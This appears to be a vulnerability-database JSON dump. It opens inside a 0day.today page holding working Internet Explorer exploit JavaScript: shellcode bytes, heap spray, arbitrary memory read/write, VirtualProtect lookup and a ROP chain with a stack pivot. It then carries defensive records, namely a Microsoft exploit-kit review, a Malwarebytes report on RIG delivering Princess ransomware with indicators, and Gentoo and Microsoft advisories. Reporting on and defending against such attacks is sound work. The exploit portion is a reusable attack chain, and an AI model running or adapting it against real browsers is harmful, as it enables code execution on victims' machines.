0x56, 0xe8, 0x09, 0x00, 0x00, 0x00, 0x5e, 0x5d, 0x5b, 0x8b, 0x63, 0x0c, 0xc2, 0x0c, 0x00, 0x90];\r\n var shellcode = [96, 49, 210, 82, 104, 99, 97, 108, 99, 84, 89, 82, 81, 100, 139, 114, 48, 139, 118, 12, 139, 118, 12, 173, 139, 48, 139, 126, 24, 139, 95, 60, 139, 92, 31, 120, 139, 116, 31, 32, 1, 254, 139, 84, 31, 36, 15, 183, 44, 23, 66, 66, 173, 129, 60, 7, 87, 105, 110, 69, 117, 240, 139, 116, 31, 28, 1, 254, 3, 60, 174, 255, 215, 88, 88, 97, 195]; // open calc.exe shellcode\r\n spray[k][1] = new 
Uint8Array(shellcode_caller.concat(shellcode)); // shellcode, pointed by 0x128e0024\r\n sc_obj = read_dword_from_addr(damaged_array, 0x128e0024); // address of the Uint8Array object containing the shellcode\r\n sc_data = read_dword_from_addr(damaged_array, sc_obj + 0x20); // address of the shellcode buffer itself\r\n construct_gadget_dict(damaged_array, jscript9_base_addr);\r\n \r\n // construct the ROP chain\r\n spray[k][0][0] = jscript9_base_addr + gadget_offsets[\"g1\"]; // mov dword ptr [ecx+0c], eax # ret\r\n spray[k][0][1] = jscript9_base_addr + gadget_offsets[\"g2\"]; // ret\r\n spray[k][0][2] = vp_addr; // VirtualProtectStub pointer\r\n spray[k][0][3] = sc_data; // shellcode address (return address to which we return after VirtualProtect)\r\n spray[k][0][4] = sc_data; // lpAddress\r\n spray[k][0][5] = spray[k][1].length; // dwSize\r\n spray[k][0][6] = 0x40; // flNewProtect = PAGE_EXECUTE_READWRITE\r\n spray[k][0][7] = rc_buf_ui32_data + 0x20; // lpflOldProtect\r\n spray[k][0][0x90 / 4] = jscript9_base_addr + gadget_offsets[\"stackpivot\"]; // stackpivot gadget in offset 0x90 from ROP chain top\r\n write_dword_to_addr(damaged_array, arr_obj, rc_buf_ui32_data); // overwrite the JavascriptArray object's vftable pointer with the address of the ROP chain\r\n spray[k][2][0] = 0; // set the first item of the overwritten JavascriptArray object, triggering the call to JavascriptArray::SetItem. 
since the vftable is now the ROP chain, and SetItem is in offset 0x90 in the original vftable, this will trigger the stackpivot gadget\r\n }\r\n }\r\n }\r\n}\r\n \r\nfunction get_index_from_addr(addr) {\r\n return Math.floor((addr - 0x10000) / 4);\r\n}\r\n \r\nfunction get_iat_offset(arr, js9_base) {\r\n return 0x3e6000;\r\n}\r\n \r\nfunction get_pe_header_offset(arr, js9_base) {\r\n var offset = read_dword_from_addr(arr, js9_base + 0x3c);\r\n return offset;\r\n}\r\n \r\nfunction get_import_table_offset(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_offset = read_dword_from_addr(arr, pe_header + 0x80);\r\n return import_table_offset;\r\n}\r\n \r\nfunction get_import_table_size(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_size = read_dword_from_addr(arr, pe_header + 0x84);\r\n return import_table_size;\r\n}\r\n \r\nfunction get_vp_addr(arr, js9_base) {\r\n var kernel32_entry = get_kernel32_entry(arr, js9_base);\r\n var string_pointers_offset = read_dword_from_addr(arr, kernel32_entry - 0xc);\r\n var function_pointers_offset = read_dword_from_addr(arr, kernel32_entry + 0x4);\r\n var func_name = new String();\r\n for (fptr = js9_base + function_pointers_offset, sptr = js9_base + string_pointers_offset; fptr != 0 && sptr != 0; fptr += 4, sptr += 4) {\r\n func_name = read_string_from_addr(arr, js9_base + read_dword_from_addr(arr, sptr) +2);\r\n if (func_name.indexOf(\"VirtualProtect\") > -1) {\r\n return read_dword_from_addr(arr, fptr);\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction get_kernel32_entry(arr, js9_base) {\r\n var it_addr = js9_base + get_import_table_offset(arr, js9_base);\r\n var it_size = get_import_table_size(arr, js9_base);\r\n var s = new String();\r\n for (var next_addr = it_addr + 0xc; next_addr < js9_base + it_addr + it_size; next_addr += 
0x14) {\r\n var it_entry = read_dword_from_addr(arr, next_addr);\r\n if (it_entry != 0) {\r\n s = read_string_from_addr(arr, js9_base + it_entry);\r\n if (s.indexOf(\"KERNEL32\") > -1 || s.indexOf(\"kernel32\") > -1) {\r\n return next_addr;\r\n }\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction read_dword_from_addr(arr, addr) {\r\n return arr[get_index_from_addr(addr)];\r\n}\r\n \r\nfunction read_byte_from_addr(arr, addr) {\r\n var mod = addr % 4;\r\n var ui32 = read_dword_from_addr(arr, addr);\r\n return ((ui32 >> (mod * 8)) & 0x000000ff);\r\n \r\n}\r\n \r\nfunction read_string_from_addr(arr, addr) {\r\n var s = new String();\r\n var i = 0;\r\n for (i = addr, c = \"stub\"; c != String.fromCharCode(0); i++) {\r\n c = String.fromCharCode(read_byte_from_addr(arr, i));\r\n s += c;\r\n }\r\n return s;\r\n}\r\n \r\nfunction write_dword_to_addr(arr, addr, data) {\r\n arr[get_index_from_addr(addr)] = data;\r\n}\r\n \r\nfunction find_gadget_offset(arr, js9_base, offsets, gadget, gadget_key) {\r\n var first_dword = 0x0, second_dword = 0x0, g = 0;\r\n var gadget_candidate = [];\r\n for (g = 0; g < offsets.length; g++) {\r\n first_dword = read_dword_from_addr(arr, js9_base + offsets[g]);\r\n second_dword = read_dword_from_addr(arr, js9_base + offsets[g] + 4);\r\n \r\n gadget_candidate = convert_reverse_ui32_to_array(first_dword);\r\n gadget_candidate = gadget_candidate.concat(convert_reverse_ui32_to_array(second_dword));\r\n \r\n if (contains_gadget(gadget_candidate, gadget)) {\r\n gadget_offsets[gadget_key] = offsets[g];\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction construct_gadget_dict(arr, js9_base) {\r\n find_gadget_offset(arr, js9_base, first_gadget_offsets, first_gadget, \"g1\");\r\n find_gadget_offset(arr, js9_base, stackpivot_gadget_offsets, stackpivot_gadget, \"stackpivot\");\r\n if (gadget_offsets[\"stackpivot\"] > 0) {\r\n gadget_offsets[\"g2\"] = gadget_offsets[\"stackpivot\"] + 1;\r\n }\r\n}\r\n \r\nfunction contains_gadget(arr, sub) {\r\n var i = 0;\r\n for (i = 
0; i < sub.length; i++) {\r\n if (arr.indexOf(sub[i]) == -1) return false;\r\n }\r\n return true;\r\n}\r\n \r\nfunction convert_reverse_ui32_to_array(ui32) {\r\n var arr = [];\r\n var i = 0;\r\n var tmp = ui32;\r\n for (i = 0; i < 4; i++, tmp = tmp >> 8) {\r\n arr.push(tmp & 0x000000ff);\r\n }\r\n return arr;\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-05-24] #", "sourceHref": "https://0day.today/exploit/30433", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones, 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browser and software remains to be the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. 
We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. 
Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continue to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware in 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. 
With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate at which exploit kits integrate exploits for newly disclosed vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt to continually improve their tools. 
One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe previously introduced stronger exploit mitigations, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted product** | **Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)) | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([APSB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)) | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)) | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that was patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective.\n\nIt was also SundownEK that integrated steganography in late 2016. 
Steganography, a technique that is not new but getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://microsoft.sharepoint.com/teams/osg_core_dcp/cpub/partner/antimalware/Shared Documents/8438038_RS2_Blogs/2016 in Review series/-%09https:/www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state of the art exploit mitigation technologies. 
Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operation teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n \n\n_MMPC_\n\n \n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2017-08-31T23:10:36", "description": "We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. 
This is somewhat of a change for those tracking malvertising campaigns and their payloads.\n\nWe had [analyzed ](<https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/>)the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber's onion page, the actual code was much different. A [new payment page](<https://twitter.com/campuscodi/status/900434464341463043>) seemed to have been seen in underground forums and is now being used with attacks in the wild.\n\n### From hacked site to RIG EK\n\nWe are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.\n\nYet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known \"Seamless gate\" which has been dropping copious amounts of the Ramnit Trojan.\n\n\n\nThe ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>), [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>), [CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>), [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) or Flash Player ([CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>)) vulnerabilities.\n\n### Princess ransomware\n\nOnce the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. 
The ransom note is called **__USE_TO_REPAIR_[a-zA-Z0-9].html_** where [a-zA-Z0-9] is a random identifier.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png> \"\" )\n\nThe payment page can be accessed via several provided links including a '_.onion_' one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png> \"\" )\n\n### Down but still kicking\n\nThe exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.\n\nWe will update this post with additional information about Princess Locker if there is anything noteworthy to add.\n\n### Indicators of compromise\n\nRIG EK gate:\n \n \n 185.198.164.152\n\nRIG EK IP address:\n \n \n 188.225.84.28\n\nPrincessLocker binary:\n \n \n c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7\n\nPrincessLocker payment page:\n \n \n royall6qpvndxlsj[.]onion\n\nThe post [RIG exploit kit distributes Princess ransomware](<https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2017-08-31T20:04:32", "title": "RIG exploit kit distributes Princess ransomware", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2014-6332", "CVE-2015-2419", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-31T20:04:32", "href": "https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/", "id": "MALWAREBYTES:97E85AF6235DC2739548158FE583610A", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:33", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"www-plugins/adobe-flash-11.2.202.626\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-18T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2016-06-18T00:00:00", "id": "GLSA-201606-08", "href": "https://security.gentoo.org/glsa/201606-08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:26", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB16-10](<http://helpx.adobe.com/security/products/flash-player/apsb16-10.htm>):\n\nCVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, and CVE-2016-1019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-12T07:00:00", "type": "mscve", "title": "April 2016 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019"], "modified": "2017-05-16T07:00:00", "id": "MS:ADV160001", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV160001", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. 
\n * [Nefilim Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>): DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refused to pay or chose to restore backups, the cybercriminals were prepared to leak documents stolen from the university's network on a special website the group operates on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available, forcing Microsoft to release out-of-band updates. 
\n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely the target of a ransomware attack due to a vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing the Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages security intelligence curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environments along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of ransomware exposure with zero-touch patching by continuously patching ransomware vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough 